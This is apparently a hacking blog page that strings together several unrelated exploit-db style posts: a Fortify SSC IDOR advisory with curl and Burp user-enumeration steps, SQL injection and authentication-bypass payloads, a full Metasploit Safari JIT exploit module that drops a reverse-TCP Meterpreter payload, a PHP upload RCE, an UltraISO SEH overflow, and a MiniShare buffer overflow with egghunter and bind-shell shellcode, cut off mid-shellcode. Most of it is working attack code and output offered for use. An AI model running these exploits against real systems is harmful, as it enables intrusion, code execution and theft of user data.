Details
================
Software: Fortify SSC (Software Security Center)
Version: 17.10, 17.20 & 18.10
Homepage: https://www.microfocus.com
Advisory report: https://github.com/alt3kx/CVE-2018-7691
CVE: CVE-2018-7691
CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE-639
Description
================
REST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method
Vulnerability
================
Fortify SSC (Software Security Center) 17.10, does not properly check ownership of "authEntities", which allows remote authenticated (view-only) users
to read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities
Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.
Proof of concept
================
Pre-requisites:
- Curl command deployed (Windows or Linux)
- jq command deployed (for parsing JSON fields), (Windows or Linux)
- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)
Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),
The URL normally is avaiable as following:
Target: https://fortifyserver.com/ssc/#/
Step (2): Once logged extract the Cookie field, the format normally as following: "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default
Step (4): The offending POST is:
POST /ssc/api/v1/bulk HTTP/1.1
Host: fortifyserver.com
Connection: close
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;
Content-Length: 123
{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a
Step (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:
# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk
-H "Host: fortifyserver.com"
-H "Connection: close"
-H "Accept: application/json, text/plain, */*"
-H "X-Requested-With: XMLHttpRequest"
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
-H "Content-Type: application/json;charset=UTF-8"
-H "Accept-Encoding: gzip, deflate"
-H "Accept-Language: en-US,en;q=0.9"
-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'
You should see the following response:
200
Step (6): Now extract all local and LDAP users registered into Fortify SSC server:
Payload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field "--data-binary" below and change the number as following:
# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk
-H "Host: fortifyserver.com"
-H "Connection: close"
-H "Accept: application/json, text/plain, */*"
-H "X-Requested-With: XMLHttpRequest"
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
-H "Content-Type: application/json;charset=UTF-8"
-H "Accept-Encoding: gzip, deflate"
-H "Accept-Language: en-US,en;q=0.9"
-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'
You should see the following response with users available
"admin"
"sca"
"alex"
[../snip]
Step (7): Automate with BurpSuite Pro/Free choose:
Payload Positions: "Intruder Tab -> Positions" highlight as following:
-> /api/v1/projectVersions/§1§/authEntities
Payloads set: "Intruder Tab -> Payloads" with the following data:
-> Payload set: 1
-> Payload type: Numbers
Payload Options [Numbers]:
-> Type: Sequential
-> From: 0
-> To: 1500
-> Step: 1
Then start attack…
Have fun!
Have fun!
Mitigations
================
Install the latest patches availabe here:
https://softwaresupport.softwaregrp.com/doc/KM03298201
Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
This vulnerability will be published if we do not receive a response to this report with 10 days.
Timeline
================
2018-05-24: Discovered
2018-05-25: Retest PRO environment
2018-05-31: Vendor notification, two issues found
2018-05-31: Vendor feedback received
2018-06-01: Internal communication
2018-06-01: Vendor feedback, two issues are confirmed
2018-06-05: Vendor notification, new issue found
2018-06-06: Vendor feedback, evaluating High submission
2018-06-08: Vendor feedback, High issue is confirmed
2018-06-19: Researcher, reminder sent
2018-06-22: Vendor feedback, summary of CVEs handled as official way
2018-06-26: Vendor feedback, official Hotfix for High issue available to test
2018-06-29: Researcher feedback
2018-07-02: Researcher feedback
2018-07-04: Researcher feedback, Hotfix tested on QA environment
2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
2018-08-02: Reminder to vendor, feedback received OK!
2018-09-26: Reminder to vendor, feedback received OK!
2018-09-26: Fixes received from the vendor
2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Feedback from the vendor, technical details provided to the researcher
2018-10-16: Fixes now tested on QA environment
2018-11-08: Reminder received from the vendor, feedback provided by researcher
2018-11-09: Re-rest fixes on QA environment
2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
2018-11-21: Researcher feedback
2018-11-23: Fixes working well/confirmed by researcher
2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
2018-12-12: Public report
Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.
My current exploit list @exploit-db:
https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863587960
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - SQL Injection
# Dork: N/A
# Date: 2018-12-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
#
GET /[PATH]/reviews/campaign_add.php?id=%2d%31%27%20%20%55%4e%49%4f%4e+%53%45%4c%45%43%54+1,%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29,3,4,5,%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33,24,25,%32%36%2c%32%37%2c%32%38%2c%32%39,30--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Fri, 14 Dec 2018 18:09:22 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Safari Proxy Object Type Confusion',
'Description' => %q{
This module exploits a type confusion bug in the Javascript Proxy object in
WebKit. The DFG JIT does not take into account that, through the use of a Proxy,
it is possible to run arbitrary JS code during the execution of a CreateThis
operation. This makes it possible to change the structure of e.g. an argument
without causing a bailout, leading to a type confusion (CVE-2018-4233).
The JIT region is then replaced with shellcode which loads the second stage.
The second stage exploits a logic error in libxpc, which uses command execution
via the launchd's "spawn_via_launchd" API (CVE-2018-4404).
},
'License' => MSF_LICENSE,
'Author' => [ 'saelo' ],
'References' => [
['CVE', '2018-4233'],
['CVE', '2018-4404'],
['URL', 'https://github.com/saelo/cve-2018-4233'],
['URL', 'https://github.com/saelo/pwn2own2018'],
['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],
],
'Arch' => [ ARCH_PYTHON, ARCH_CMD ],
'Platform' => 'osx',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },
'Targets' => [
[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
],
'DisclosureDate' => 'Mar 15 2018'))
register_advanced_options([
OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information in the exploit javascript", false]),
])
end
def offset_table
{
'10.12.6' => {
:jsc_vtab => '0x0000d8d8',
:dyld_stub_loader => '0x00001168',
:dlopen => '0x000027f7',
:confstr => '0x00002c84',
:strlen => '0x00001b40',
:strlen_got => '0xdc0',
},
'10.13' => {
:jsc_vtab => '0x0000e5f8',
:dyld_stub_loader => '0x000012a8',
:dlopen => '0x00002e60',
:confstr => '0x000024fc',
:strlen => '0x00001440',
:strlen_got => '0xee8',
},
'10.13.3' => {
:jsc_vtab => '0xe5e8',
:dyld_stub_loader => '0x1278',
:dlopen => '0x2e30',
:confstr => '0x24dc',
:strlen => '0x1420',
:strlen_got => '0xee0',
},
}
end
def exploit_data(directory, file)
path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
::File.binread path
end
def stage1_js
stage1 = exploit_data "CVE-2018-4233", "stage1.bin"
"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);"
end
def stage2_js
stage2 = exploit_data "CVE-2018-4404", "stage2.dylib"
payload_cmd = payload.raw
if target['Arch'] == ARCH_PYTHON
payload_cmd = "echo \"#{payload_cmd}\" | python"
end
placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')
stage2[placeholder_index, payload_cmd.length] = payload_cmd
"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);"
end
def get_offsets(user_agent)
if user_agent =~ /Intel Mac OS X (.*?)\)/
version = $1.gsub("_", ".")
mac_osx_version = Gem::Version.new(version)
if mac_osx_version >= Gem::Version.new('10.13.4')
print_warning "macOS version #{mac_osx_version} is not vulnerable"
elsif mac_osx_version < Gem::Version.new('10.12')
print_warning "macOS version #{mac_osx_version} is not vulnerable"
elsif offset_table.key?(version)
offset = offset_table[version]
return <<-EOF
const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
const DLOPEN_OFFSET = #{offset[:dlopen]};
const CONFSTR_OFFSET = #{offset[:confstr]};
const STRLEN_OFFSET = #{offset[:strlen]};
const STRLEN_GOT_OFFSET = #{offset[:strlen_got]};
EOF
else
print_warning "No offsets for version #{mac_osx_version}"
end
else
print_warning "Unexpected User-Agent"
end
return false
end
def on_request_uri(cli, request)
user_agent = request['User-Agent']
print_status("Request from #{user_agent}")
offsets = get_offsets(user_agent)
unless offsets
send_not_found(cli)
return
end
utils = exploit_data "CVE-2018-4233", "utils.js"
int64 = exploit_data "CVE-2018-4233", "int64.js"
html = %Q^
<html>
<body>
<script>
#{stage1_js}
stage1.replace = function(oldVal, newVal) {
for (var idx = 0; idx < this.length; idx++) {
var found = true;
for (var j = idx; j < idx + 8; j++) {
if (this[j] != oldVal.byteAt(j - idx)) {
found = false;
break;
}
}
if (found)
break;
}
this.set(newVal.bytes(), idx);
};
#{stage2_js}
#{utils}
#{int64}
#{offsets}
var ready = new Promise(function(resolve) {
if (typeof(window) === 'undefined')
resolve();
else
window.onload = function() {
resolve();
}
});
ready = Promise.all([ready]);
print = function(msg) {
//console.log(msg);
//document.body.innerText += msg + '\\n';
}
// Must create this indexing type transition first,
// otherwise the JIT will deoptimize later.
var a = [13.37, 13.37];
a[0] = {};
var referenceFloat64Array = new Float64Array(0x1000);
//
// Bug: the DFG JIT does not take into account that, through the use of a
// Proxy, it is possible to run arbitrary JS code during the execution of a
// CreateThis operation. This makes it possible to change the structure of e.g.
// an argument without causing a bailout, leading to a type confusion.
//
//
// addrof primitive
//
function setupAddrof() {
function InfoLeaker(a) {
this.address = a[0];
}
var trigger = false;
var leakme = null;
var arg = null;
var handler = {
get(target, propname) {
if (trigger)
arg[0] = leakme;
return target[propname];
},
};
var InfoLeakerProxy = new Proxy(InfoLeaker, handler);
for (var i = 0; i < 100000; i++) {
new InfoLeakerProxy([1.1, 2.2, 3.3]);
}
trigger = true;
return function(obj) {
leakme = obj;
arg = [1.1, 1.1];
var o = new InfoLeakerProxy(arg);
return o.address;
};
}
//
// fakeobj primitive
//
function setupFakeobj() {
function ObjFaker(a, address) {
a[0] = address;
}
var trigger = false;
var arg = null;
var handler = {
get(target, propname) {
if (trigger)
arg[0] = {};
return target[propname];
},
};
var ObjFakerProxy = new Proxy(ObjFaker, handler);
for (var i = 0; i < 100000; i++) {
new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);
}
trigger = true;
return function(address) {
arg = [1.1, 1.1];
var o = new ObjFakerProxy(arg, address);
return arg[0];
};
}
function makeJITCompiledFunction() {
// Some code to avoid inlining...
function target(num) {
for (var i = 2; i < num; i++) {
if (num % i === 0) {
return false;
}
}
return true;
}
// Force JIT compilation.
for (var i = 0; i < 1000; i++) {
target(i);
}
for (var i = 0; i < 1000; i++) {
target(i);
}
for (var i = 0; i < 1000; i++) {
target(i);
}
return target;
}
function pwn() {
// Spray Float64Array structures so that structure ID 0x1000 will
// be a Float64Array with very high probability
var structs = [];
for (var i = 0; i < 0x1000; i++) {
var a = new Float64Array(1);
a['prop' + i] = 1337;
structs.push(a);
}
// Setup exploit primitives
var addrofOnce = setupAddrof();
var fakeobjOnce = setupFakeobj();
// (Optional) Spray stuff to keep the background GC busy and increase reliability even further
/*
var stuff = [];
for (var i = 0; i < 0x100000; i++) {
stuff.push({foo: i});
}
*/
var float64MemView = new Float64Array(0x200);
var uint8MemView = new Uint8Array(0x1000);
// Setup container to host the fake Float64Array
var jsCellHeader = new Int64([
00, 0x10, 00, 00, // m_structureID
0x0, // m_indexingType
0x2b, // m_type
0x08, // m_flags
0x1 // m_cellState
]);
var container = {
jsCellHeader: jsCellHeader.asJSValue(),
butterfly: null,
vector: float64MemView,
length: (new Int64('0x0001000000001337')).asJSValue(),
mode: {}, // an empty object, we'll need that later
};
// Leak address and inject fake object
// RawAddr == address in float64 form
var containerRawAddr = addrofOnce(container);
var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);
print("[+] Fake Float64Array @ " + fakeArrayAddr);
///
/// BEGIN CRITICAL SECTION
///
/// Objects are corrupted, a GC would now crash the process.
/// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.
///
var driver = fakeobjOnce(fakeArrayAddr.asDouble());
while (!(driver instanceof Float64Array)) {
jsCellHeader.assignAdd(jsCellHeader, Int64.One);
container.jsCellHeader = jsCellHeader.asJSValue();
}
// Get some addresses that we'll need to repair our objects. We'll abuse the .mode
// property of the container to leak addresses.
driver[2] = containerRawAddr;
var emptyObjectRawAddr = float64MemView[6];
container.mode = referenceFloat64Array;
var referenceFloat64ArrayRawAddr = float64MemView[6];
// Fixup the JSCell header of the container to make it look like an empty object.
// By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.
driver[2] = emptyObjectRawAddr;
var header = float64MemView[0];
driver[2] = containerRawAddr;
float64MemView[0] = header;
// Copy the JSCell header from an existing Float64Array and set the butterfly to zero.
// Also set the mode: make it look like an OversizeTypedArray for easy GC survival
// (see JSGenericTypedArrayView<Adaptor>::visitChildren).
driver[2] = referenceFloat64ArrayRawAddr;
var header = float64MemView[0];
var length = float64MemView[3];
var mode = float64MemView[4];
driver[2] = containerRawAddr;
float64MemView[2] = header;
float64MemView[3] = 0;
float64MemView[5] = length;
float64MemView[6] = mode;
// Root the container object so it isn't garbage collected.
// This will allocate a butterfly for the fake object and store a reference to the container there.
// The fake array itself is rooted by the memory object (closures).
driver.container = container;
///
/// END CRITICAL SECTION
///
/// Objects are repaired, we will now survive a GC
///
if (typeof(gc) !== 'undefined')
gc();
memory = {
read: function(addr, length) {
driver[2] = memory.addrof(uint8MemView).asDouble();
float64MemView[2] = addr.asDouble();
var a = new Array(length);
for (var i = 0; i < length; i++)
a[i] = uint8MemView[i];
return a;
},
write: function(addr, data) {
driver[2] = memory.addrof(uint8MemView).asDouble();
float64MemView[2] = addr.asDouble();
for (var i = 0; i < data.length; i++)
uint8MemView[i] = data[i];
},
read8: function(addr) {
driver[2] = addr.asDouble();
return Int64.fromDouble(float64MemView[0]);
},
write8: function(addr, value) {
driver[2] = addr.asDouble();
float64MemView[0] = value.asDouble();
},
addrof: function(obj) {
float64MemView.leakme = obj;
var butterfly = Int64.fromDouble(driver[1]);
return memory.read8(Sub(butterfly, 0x10));
},
};
print("[+] Got stable memory read/write!");
// Find binary base
var funcAddr = memory.addrof(Math.sin);
var executableAddr = memory.read8(Add(funcAddr, 24));
var codeAddr = memory.read8(Add(executableAddr, 24));
var vtabAddr = memory.read8(codeAddr);
var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);
print("[*] JavaScriptCore.dylib @ " + jscBaseUnaligned);
var jscBase = And(jscBaseUnaligned, new Int64("0x7ffffffff000"));
print("[*] JavaScriptCore.dylib @ " + jscBase);
var dyldStubLoaderAddr = memory.read8(jscBase);
var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);
var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));
var libCBase = Sub(strlenAddr, STRLEN_OFFSET);
print("[*] dyld.dylib @ " + dyldBase);
print("[*] libsystem_c.dylib @ " + libCBase);
var confstrAddr = Add(libCBase, CONFSTR_OFFSET);
print("[*] confstr @ " + confstrAddr);
var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);
print("[*] dlopen @ " + dlopenAddr);
// Patching shellcode
var stage2Addr = memory.addrof(stage2);
stage2Addr = memory.read8(Add(stage2Addr, 16));
print("[*] Stage 2 payload @ " + stage2Addr);
stage1.replace(new Int64("0x4141414141414141"), confstrAddr);
stage1.replace(new Int64("0x4242424242424242"), stage2Addr);
stage1.replace(new Int64("0x4343434343434343"), new Int64(stage2.length));
stage1.replace(new Int64("0x4444444444444444"), dlopenAddr);
print("[+] Shellcode patched");
// Leak JITCode pointer poison value
var poison_addr = Add(jscBase, 305152);
print("[*] Poison value @ " + poison_addr);
var poison = memory.read8(poison_addr);
print("[*] Poison value: " + poison);
// Shellcode
var func = makeJITCompiledFunction();
var funcAddr = memory.addrof(func);
print("[+] Shellcode function object @ " + funcAddr);
var executableAddr = memory.read8(Add(funcAddr, 24));
print("[+] Executable instance @ " + executableAddr);
var jitCodeAddr = memory.read8(Add(executableAddr, 24));
print("[+] JITCode instance @ " + jitCodeAddr);
var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));
var codeAddr = Xor(codeAddrPoisoned, poison);
print("[+] RWX memory @ " + codeAddr.toString());
print("[+] Writing shellcode...");
var origCode = memory.read(codeAddr, stage1.length);
memory.write(codeAddr, stage1);
print("[!] Jumping into shellcode...");
var res = func();
if (res === 0) {
print("[+] Shellcode executed sucessfully!");
} else {
print("[-] Shellcode failed to execute: error " + res);
}
memory.write(codeAddr, origCode);
print("[*] Restored previous JIT code");
print("[+] We are done here, continuing WebContent process as if nothing happened =)");
if (typeof(gc) !== 'undefined')
gc();
}
ready.then(function() {
try {
pwn();
} catch (e) {
print("[-] Exception caught: " + e);
}
}).catch(function(err) {
print("[-] Initializatin failed");
});
</script>
</body>
</html>
^
unless datastore['DEBUG_EXPLOIT']
html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '')
end
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
# Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass
# Date: 2018-12-08
# Exploit Author: Veyselxan
# Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018
# Version: v1 (REQUIRED)
# Tested on: Linux
http://traget/admin/index.php
username: '=''or'
Password: '=''or'
# Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) and Pointer to next SEH and SE handler records overwrite
# Discovery by: Francisco Ramirez
# Discovery Date: 2018-12-14
# Vendor Homepage: https://www.ultraiso.com/
# Software Link : https://www.ultraiso.com/download.html
# Tested Version: 9.7.1.3519
# Tested on: Windows 10 Pro - 64 bit
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run python code : python UltraISO_9.7.1.3519.py
# 2.- Open UltraISO_9.7.1.3519.txt and copy content to clipboard
# 3.- Open UltraISO_9.7.1.3519
# 4.- In the Window select 'Tools' > 'Make CD/DVD Image'
# 5.- In the field 'Output FileName' remove the default path.
# 6.- Paste the content of UltraISO_9.7.1.3519.txt into the field: 'Output FileName'
# 7.- Click 'Make' and you will see a crash.
#!/usr/bin/env python
a_letters = "\x41" * 304
seRecord = "\x42" * 4
sehRecord = "\x43" * 4
buffer = a_letters + seRecord + sehRecord
f = open ("UltraISO_9.7.1.3519.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution
# Dork: N/A
# Date: 2018-12-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]
#
POST /[PATH]/reviews/action.php?action=custom_reviews HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 922
Referer: http://localhost/[PATH]/reviews/custom_reviews_add.php
Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------4704926813981: undefined
Content-Disposition: form-data; name="photo"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------4704926813981
Content-Disposition: form-data; name="hidden_photo"
-----------------------------4704926813981
Content-Disposition: form-data; name="name"
Efe
-----------------------------4704926813981
Content-Disposition: form-data; name="rating"
4.5
-----------------------------4704926813981
Content-Disposition: form-data; name="review"
Efe
-----------------------------4704926813981
Content-Disposition: form-data; name="date"
12/14/2018
-----------------------------4704926813981
Content-Disposition: form-data; name="id"
-----------------------------4704926813981
Content-Disposition: form-data; name="submit"
submit
-----------------------------4704926813981--
HTTP/1.1 302 Found
Date: Fri, 14 Dec 2018 18:17:48 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: custom_reviews.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET /[PATH]/reviews/uploads/264082phpinfo.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/reviews/custom_reviews.php
Cookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 14 Dec 2018 18:17:49 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
methods are also vulnerable. The difference is minimal, both are exploited
in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length
-------------------------------------------------------------------
EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII
"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
HTTP/1.1
"
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
------------------------------------------------------------------------------
Only 210 bytes to shellcode
------------------------------------------------------------------------------
Badchars '00','0d'
------------------------------------------------------------------------------
>findjmp kernel32.dll esp - XP SP 3 English
Scanning kernel32.dll for code useable with the esp register
0x7C809F83 call esp
0x7C8369E0 call esp
0x7C83C2C5 push esp - ret
0x7C87641B call esp
<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19861
# Category: exploit
1. Description
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP HEAD request.
2. Proof of Concept
Exploit:
#!/usr/bin/env python
import socket
import struct
import os
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP HEAD request - by Rafa
# CVE: CVE-2018-19861
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
egghunter =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
python -a x86 --platform windows -b "\x00\x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
